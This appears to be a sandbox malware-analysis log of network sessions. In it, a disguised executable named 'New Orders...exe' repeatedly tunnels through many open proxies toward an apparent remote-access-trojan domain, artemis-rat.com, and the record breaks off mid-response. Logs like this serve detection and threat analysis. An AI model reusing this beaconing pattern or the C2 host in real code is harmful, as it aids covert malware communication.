                                                                                        Mar 11, 2024 16:16:46.961199045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.116277933 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1582192.168.2.94997441.128.148.7619767672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.961205006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132507086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.190737009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:59.242083073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:11.291811943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:23.445471048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:35.445018053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:59.445051908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:47.460692883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1583192.168.2.95450427.76.193.21310807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.961796045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1584192.168.2.953118159.65.245.255807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.964747906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985064030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.667507887 CET442INHTTP/1.1 403 Forbidden
                                                                                        Date: Mon, 11 Mar 2024 15:16:50 GMT
                                                                                        Server: Apache/2.4.18 (Ubuntu)
                                                                                        Content-Length: 281
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1585192.168.2.954126181.13.198.9041537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.964819908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1586192.168.2.954502103.153.154.6807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.964883089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1587192.168.2.954510103.166.141.74200747672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.964962006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1588192.168.2.954764211.234.125.54437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.965188980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1589192.168.2.954620172.67.206.105807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.965289116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.120084047 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1590192.168.2.95424852.151.210.20490007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.967473984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1591192.168.2.954551195.25.20.10831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.967891932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1592192.168.2.95454747.243.114.19281807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.967891932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1593192.168.2.95451339.105.27.3031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.968183994 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:47.310461998 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                        Mar 11, 2024 16:16:47.310905933 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1594192.168.2.953052117.20.56.20341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.974092960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1595192.168.2.954537157.185.173.217265897672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.974483967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1596192.168.2.95481345.144.30.2324437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.974607944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1597192.168.2.95458835.185.196.3831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.974807024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.176340103 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1598192.168.2.95016480.251.219.4031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.974838018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.156105995 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1599192.168.2.954663185.162.231.254807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.989459991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.144515038 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:47 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1600192.168.2.95003251.158.64.130163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.989551067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.985085011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976636887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.682305098 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
